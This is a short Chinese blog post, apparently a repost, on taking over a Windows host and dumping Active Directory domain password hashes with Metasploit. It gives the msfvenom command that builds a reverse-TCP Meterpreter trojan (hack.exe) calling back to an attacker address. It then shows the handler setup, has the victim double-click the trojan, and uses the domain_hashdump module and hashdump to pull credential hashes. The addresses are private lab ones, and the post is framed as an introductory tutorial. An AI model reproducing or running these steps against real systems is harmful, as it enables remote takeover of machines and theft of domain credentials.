使用metasploit获取域散列值

使用metasploit获取域散列值,第1张

使用metasploit获取域散列值

明天休息一天,后天补班,然后连续工作三天,请一天假,做PPT。是的,国庆我要讲内网安全入门,希望大家能捧个场。由于组内离职了2个核心员工,我设计的一堆项目,都没人开发了,Q4不得不自己Coding,一个是AI Spark项目,另一个是UEBA新规则,还有一堆杂七杂八的支撑项目。酒入愁肠愁更愁,也不知道自己能坚持多久,也不知道剩下的人能坚持多久。

第一步:生成木马文件
  • 生成木马(hack.exe)
  • 投递到目标服务(windows 192.168.160.143)
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.160.140 -f exe > hack.exe

第二步:监听5555端口
  • 通过metasploit监听5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555

第三步:期待鱼儿上钩
  • 去目标服务器上双击一下木马(hack.exe)

第四步:获得shell会话
  • 只要双击(hack.exe),立马控制目标
exploit -j -z

由于是双击的木马,并不是特权账号,导致无法获得ntds.dit活动目录文件,也就无法拿到域散列值。所以,我又通过管理员权限运行了木马文件,这回有了。

第五步:读取ntds.dit,解析得到域散列值
use windows/gather/credentials/domain_hashdump
set session 3
  • 遗憾的是,竟然报错,我一个特权账号,竟然拷贝不出来ntds.dit

  • 怎么能放弃?继续搞!
  • 直接进入shell会话里,hashdump直接拿到所有的域散列值

本篇完~

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5680593.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存